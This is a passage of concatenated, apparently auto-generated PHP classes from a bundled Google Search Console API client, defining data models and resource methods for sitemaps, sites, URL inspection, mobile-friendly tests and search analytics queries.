extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'issues'; protected $issuesType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileUsabilityIssue::class; protected $issuesDataType = 'array'; /** * @var string */ public $verdict; /** * @param MobileUsabilityIssue[] */ public function setIssues($issues) { $this->issues = $issues; } /** * @return MobileUsabilityIssue[] */ public function getIssues() { return $this->issues; } /** * @param string */ public function setVerdict($verdict) { $this->verdict = $verdict; } /** * @return string */ public function getVerdict() { return $this->verdict; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileUsabilityInspectionResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_MobileUsabilityInspectionResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class RichResultsInspectionResult extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'detectedItems'; protected $detectedItemsType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\DetectedItems::class; protected $detectedItemsDataType = 'array'; /** * @var string */ public $verdict; /** * @param DetectedItems[] */ public function setDetectedItems($detectedItems) { $this->detectedItems = $detectedItems; } /** * @return DetectedItems[] */ public function getDetectedItems() { return $this->detectedItems; } /** * @param string */ public function setVerdict($verdict) { $this->verdict = $verdict; } /** * @return string */ public function getVerdict() { return $this->verdict; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RichResultsInspectionResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_RichResultsInspectionResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class MobileUsabilityIssue extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $issueType; /** * @var string */ public $message; /** * @var string */ public $severity; /** * @param string */ public function setIssueType($issueType) { $this->issueType = $issueType; } /** * @return string */ public function getIssueType() { return $this->issueType; } /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } /** * @param string */ public function setSeverity($severity) { $this->severity = $severity; } /** * @return string */ public function getSeverity() { return $this->severity; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileUsabilityIssue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_MobileUsabilityIssue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class RunMobileFriendlyTestResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'resourceIssues'; /** * @var string */ public $mobileFriendliness; protected $mobileFriendlyIssuesType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\MobileFriendlyIssue::class; protected $mobileFriendlyIssuesDataType = 'array'; protected $resourceIssuesType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ResourceIssue::class; protected $resourceIssuesDataType = 'array'; protected $screenshotType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Image::class; protected $screenshotDataType = ''; protected $testStatusType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\TestStatus::class; protected $testStatusDataType = ''; /** * @param string */ public function setMobileFriendliness($mobileFriendliness) { $this->mobileFriendliness = $mobileFriendliness; } /** * @return string */ public function getMobileFriendliness() { return $this->mobileFriendliness; } /** * @param MobileFriendlyIssue[] */ public function setMobileFriendlyIssues($mobileFriendlyIssues) { $this->mobileFriendlyIssues = $mobileFriendlyIssues; } /** * @return MobileFriendlyIssue[] */ public function getMobileFriendlyIssues() { return $this->mobileFriendlyIssues; } /** * @param ResourceIssue[] */ public function setResourceIssues($resourceIssues) { $this->resourceIssues = $resourceIssues; } /** * @return ResourceIssue[] */ public function getResourceIssues() { return $this->resourceIssues; } /** * @param Image */ public function setScreenshot(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Image $screenshot) { $this->screenshot = $screenshot; } /** * @return Image */ public function getScreenshot() { return $this->screenshot; } /** * @param TestStatus */ public function setTestStatus(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\TestStatus $testStatus) { $this->testStatus = $testStatus; } /** * @return TestStatus */ public function getTestStatus() { return $this->testStatus; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RunMobileFriendlyTestResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_RunMobileFriendlyTestResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class InspectUrlIndexResponse extends \Google\Site_Kit_Dependencies\Google\Model { protected $inspectionResultType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\UrlInspectionResult::class; protected $inspectionResultDataType = ''; /** * @param UrlInspectionResult */ public function setInspectionResult(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\UrlInspectionResult $inspectionResult) { $this->inspectionResult = $inspectionResult; } /** * @return UrlInspectionResult */ public function getInspectionResult() { return $this->inspectionResult; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\InspectUrlIndexResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_InspectUrlIndexResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class IndexStatusInspectionResult extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'sitemap'; /** * @var string */ public $coverageState; /** * @var string */ public $crawledAs; /** * @var string */ public $googleCanonical; /** * @var string */ public $indexingState; /** * @var string */ public $lastCrawlTime; /** * @var string */ public $pageFetchState; /** * @var string[] */ public $referringUrls; /** * @var string */ public $robotsTxtState; /** * @var string[] */ public $sitemap; /** * @var string */ public $userCanonical; /** * @var string */ public $verdict; /** * @param string */ public function setCoverageState($coverageState) { $this->coverageState = $coverageState; } /** * @return string */ public function getCoverageState() { return $this->coverageState; } /** * @param string */ public function setCrawledAs($crawledAs) { $this->crawledAs = $crawledAs; } /** * @return string */ public function getCrawledAs() { return $this->crawledAs; } /** * @param string */ public function setGoogleCanonical($googleCanonical) { $this->googleCanonical = $googleCanonical; } /** * @return string */ public function getGoogleCanonical() { return $this->googleCanonical; } /** * @param string */ public function setIndexingState($indexingState) { $this->indexingState = $indexingState; } /** * @return string */ public function getIndexingState() { return $this->indexingState; } /** * @param string */ public function setLastCrawlTime($lastCrawlTime) { $this->lastCrawlTime = $lastCrawlTime; } /** * @return string */ public function getLastCrawlTime() { return $this->lastCrawlTime; } /** * @param string */ public function setPageFetchState($pageFetchState) { $this->pageFetchState = $pageFetchState; } /** * @return string */ public function getPageFetchState() { return $this->pageFetchState; } /** * @param string[] */ public function setReferringUrls($referringUrls) { $this->referringUrls = $referringUrls; } /** * @return string[] */ public function getReferringUrls() { return $this->referringUrls; } /** * @param string */ public function setRobotsTxtState($robotsTxtState) { $this->robotsTxtState = $robotsTxtState; } /** * @return string */ public function getRobotsTxtState() { return $this->robotsTxtState; } /** * @param string[] */ public function setSitemap($sitemap) { $this->sitemap = $sitemap; } /** * @return string[] */ public function getSitemap() { return $this->sitemap; } /** * @param string */ public function setUserCanonical($userCanonical) { $this->userCanonical = $userCanonical; } /** * @return string */ public function getUserCanonical() { return $this->userCanonical; } /** * @param string */ public function setVerdict($verdict) { $this->verdict = $verdict; } /** * @return string */ public function getVerdict() { return $this->verdict; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\IndexStatusInspectionResult::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_IndexStatusInspectionResult'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class ApiDimensionFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimension; /** * @var string */ public $expression; /** * @var string */ public $operator; /** * @param string */ public function setDimension($dimension) { $this->dimension = $dimension; } /** * @return string */ public function getDimension() { return $this->dimension; } /** * @param string */ public function setExpression($expression) { $this->expression = $expression; } /** * @return string */ public function getExpression() { return $this->expression; } /** * @param string */ public function setOperator($operator) { $this->operator = $operator; } /** * @return string */ public function getOperator() { return $this->operator; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ApiDimensionFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_ApiDimensionFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SitemapsListResponse; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSitemap; /** * The "sitemaps" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $sitemaps = $searchconsoleService->sitemaps; * </code> */ class Sitemaps extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Deletes a sitemap from the Sitemaps report. Does not stop Google from * crawling this sitemap or the URLs that were previously crawled in the deleted * sitemap. (sitemaps.delete) * * @param string $siteUrl The site's URL, including protocol. For example: * `http://www.example.com/`. * @param string $feedpath The URL of the actual sitemap. For example: * `http://www.example.com/sitemap.xml`. * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($siteUrl, $feedpath, $optParams = []) { $params = ['siteUrl' => $siteUrl, 'feedpath' => $feedpath]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Retrieves information about a specific sitemap. (sitemaps.get) * * @param string $siteUrl The site's URL, including protocol. For example: * `http://www.example.com/`. * @param string $feedpath The URL of the actual sitemap. For example: * `http://www.example.com/sitemap.xml`. * @param array $optParams Optional parameters. * @return WmxSitemap * @throws \Google\Service\Exception */ public function get($siteUrl, $feedpath, $optParams = []) { $params = ['siteUrl' => $siteUrl, 'feedpath' => $feedpath]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSitemap::class); } /** * Lists the [sitemaps-entries](/webmaster-tools/v3/sitemaps) submitted for this * site, or included in the sitemap index file (if `sitemapIndex` is specified * in the request). (sitemaps.listSitemaps) * * @param string $siteUrl The site's URL, including protocol. For example: * `http://www.example.com/`. * @param array $optParams Optional parameters. * * @opt_param string sitemapIndex A URL of a site's sitemap index. For example: * `http://www.example.com/sitemapindex.xml`. * @return SitemapsListResponse * @throws \Google\Service\Exception */ public function listSitemaps($siteUrl, $optParams = []) { $params = ['siteUrl' => $siteUrl]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SitemapsListResponse::class); } /** * Submits a sitemap for a site. (sitemaps.submit) * * @param string $siteUrl The site's URL, including protocol. For example: * `http://www.example.com/`. * @param string $feedpath The URL of the actual sitemap. For example: * `http://www.example.com/sitemap.xml`. * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function submit($siteUrl, $feedpath, $optParams = []) { $params = ['siteUrl' => $siteUrl, 'feedpath' => $feedpath]; $params = \array_merge($params, $optParams); return $this->call('submit', [$params]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\Sitemaps::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_Sitemaps'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SitesListResponse; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSite; /** * The "sites" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $sites = $searchconsoleService->sites; * </code> */ class Sites extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Adds a site to the set of the user's sites in Search Console. (sites.add) * * @param string $siteUrl The URL of the site to add. * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function add($siteUrl, $optParams = []) { $params = ['siteUrl' => $siteUrl]; $params = \array_merge($params, $optParams); return $this->call('add', [$params]); } /** * Removes a site from the set of the user's Search Console sites. * (sites.delete) * * @param string $siteUrl The URI of the property as defined in Search Console. * **Examples:** `http://www.example.com/` or `sc-domain:example.com`. * @param array $optParams Optional parameters. * @throws \Google\Service\Exception */ public function delete($siteUrl, $optParams = []) { $params = ['siteUrl' => $siteUrl]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Retrieves information about specific site. (sites.get) * * @param string $siteUrl The URI of the property as defined in Search Console. * **Examples:** `http://www.example.com/` or `sc-domain:example.com`. * @param array $optParams Optional parameters. * @return WmxSite * @throws \Google\Service\Exception */ public function get($siteUrl, $optParams = []) { $params = ['siteUrl' => $siteUrl]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSite::class); } /** * Lists the user's Search Console sites. (sites.listSites) * * @param array $optParams Optional parameters. * @return SitesListResponse * @throws \Google\Service\Exception */ public function listSites($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SitesListResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\Sites::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_Sites'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; /** * The "urlTestingTools" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $urlTestingTools = $searchconsoleService->urlTestingTools; * </code> */ class UrlTestingTools extends \Google\Site_Kit_Dependencies\Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\UrlTestingTools::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_UrlTestingTools'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; /** * The "urlInspection" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $urlInspection = $searchconsoleService->urlInspection; * </code> */ class UrlInspection extends \Google\Site_Kit_Dependencies\Google\Service\Resource { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\UrlInspection::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_UrlInspection'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\InspectUrlIndexRequest; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\InspectUrlIndexResponse; /** * The "index" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $index = $searchconsoleService->urlInspection_index; * </code> */ class UrlInspectionIndex extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Index inspection. (index.inspect) * * @param InspectUrlIndexRequest $postBody * @param array $optParams Optional parameters. * @return InspectUrlIndexResponse * @throws \Google\Service\Exception */ public function inspect(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\InspectUrlIndexRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('inspect', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\InspectUrlIndexResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\UrlInspectionIndex::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_UrlInspectionIndex'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RunMobileFriendlyTestRequest; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RunMobileFriendlyTestResponse; /** * The "mobileFriendlyTest" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $mobileFriendlyTest = $searchconsoleService->urlTestingTools_mobileFriendlyTest; * </code> */ class UrlTestingToolsMobileFriendlyTest extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Runs Mobile-Friendly Test for a given URL. (mobileFriendlyTest.run) * * @param RunMobileFriendlyTestRequest $postBody * @param array $optParams Optional parameters. * @return RunMobileFriendlyTestResponse * @throws \Google\Service\Exception */ public function run(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RunMobileFriendlyTestRequest $postBody, $optParams = []) { $params = ['postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('run', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\RunMobileFriendlyTestResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\UrlTestingToolsMobileFriendlyTest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_UrlTestingToolsMobileFriendlyTest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SearchAnalyticsQueryRequest; use Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SearchAnalyticsQueryResponse; /** * The "searchanalytics" collection of methods. * Typical usage is: * <code> * $searchconsoleService = new Google\Service\SearchConsole(...); * $searchanalytics = $searchconsoleService->searchanalytics; * </code> */ class Searchanalytics extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Query your data with filters and parameters that you define. Returns zero or * more rows grouped by the row keys that you define. You must define a date * range of one or more days. When date is one of the group by values, any days * without data are omitted from the result list. If you need to know which days * have data, issue a broad date range query grouped by date for any metric, and * see which day rows are returned. (searchanalytics.query) * * @param string $siteUrl The site's URL, including protocol. For example: * `http://www.example.com/`. * @param SearchAnalyticsQueryRequest $postBody * @param array $optParams Optional parameters. * @return SearchAnalyticsQueryResponse * @throws \Google\Service\Exception */ public function query($siteUrl, \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SearchAnalyticsQueryRequest $postBody, $optParams = []) { $params = ['siteUrl' => $siteUrl, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('query', [$params], \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SearchAnalyticsQueryResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\Searchanalytics::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_Resource_Searchanalytics'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class WmxSitemap extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'contents'; protected $contentsType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSitemapContent::class; protected $contentsDataType = 'array'; /** * @var string */ public $errors; /** * @var bool */ public $isPending; /** * @var bool */ public $isSitemapsIndex; /** * @var string */ public $lastDownloaded; /** * @var string */ public $lastSubmitted; /** * @var string */ public $path; /** * @var string */ public $type; /** * @var string */ public $warnings; /** * @param WmxSitemapContent[] */ public function setContents($contents) { $this->contents = $contents; } /** * @return WmxSitemapContent[] */ public function getContents() { return $this->contents; } /** * @param string */ public function setErrors($errors) { $this->errors = $errors; } /** * @return string */ public function getErrors() { return $this->errors; } /** * @param bool */ public function setIsPending($isPending) { $this->isPending = $isPending; } /** * @return bool */ public function getIsPending() { return $this->isPending; } /** * @param bool */ public function setIsSitemapsIndex($isSitemapsIndex) { $this->isSitemapsIndex = $isSitemapsIndex; } /** * @return bool */ public function getIsSitemapsIndex() { return $this->isSitemapsIndex; } /** * @param string */ public function setLastDownloaded($lastDownloaded) { $this->lastDownloaded = $lastDownloaded; } /** * @return string */ public function getLastDownloaded() { return $this->lastDownloaded; } /** * @param string */ public function setLastSubmitted($lastSubmitted) { $this->lastSubmitted = $lastSubmitted; } /** * @return string */ public function getLastSubmitted() { return $this->lastSubmitted; } /** * @param string */ public function setPath($path) { $this->path = $path; } /** * @return string */ public function getPath() { return $this->path; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setWarnings($warnings) { $this->warnings = $warnings; } /** * @return string */ public function getWarnings() { return $this->warnings; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\WmxSitemap::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_WmxSitemap'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class ResourceIssue extends \Google\Site_Kit_Dependencies\Google\Model { protected $blockedResourceType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\BlockedResource::class; protected $blockedResourceDataType = ''; /** * @param BlockedResource */ public function setBlockedResource(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\BlockedResource $blockedResource) { $this->blockedResource = $blockedResource; } /** * @return BlockedResource */ public function getBlockedResource() { return $this->blockedResource; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ResourceIssue::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_ResourceIssue'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class SearchAnalyticsQueryResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'rows'; /** * @var string */ public $responseAggregationType; protected $rowsType = \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\ApiDataRow::class; protected $rowsDataType = 'array'; /** * @param string */ public function setResponseAggregationType($responseAggregationType) { $this->responseAggregationType = $responseAggregationType; } /** * @return string */ public function getResponseAggregationType() { return $this->responseAggregationType; } /** * @param ApiDataRow[] */ public function setRows($rows) { $this->rows = $rows; } /** * @return ApiDataRow[] */ public function getRows() { return $this->rows; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole\SearchAnalyticsQueryResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole_SearchAnalyticsQueryResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\SearchConsole; class WmxSite extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $permissionLevel; /** * @var string */ public $siteUrl; /** * @param string */ public function setPermissionLevel($permissionLevel) { $this->permissionLevel = $permissionLevel; } /** * @return string */ public function getPermissionLevel() { return $this->permissionLevel; } /** * @param string */ public function setSiteUrl($siteUrl) { $this->siteUrl = $siteUrl; } /** * @return string */ public function getSiteUrl() { return $this->siteUrl; } } // Adding a class alias for backwards compatibility with the previous class name. 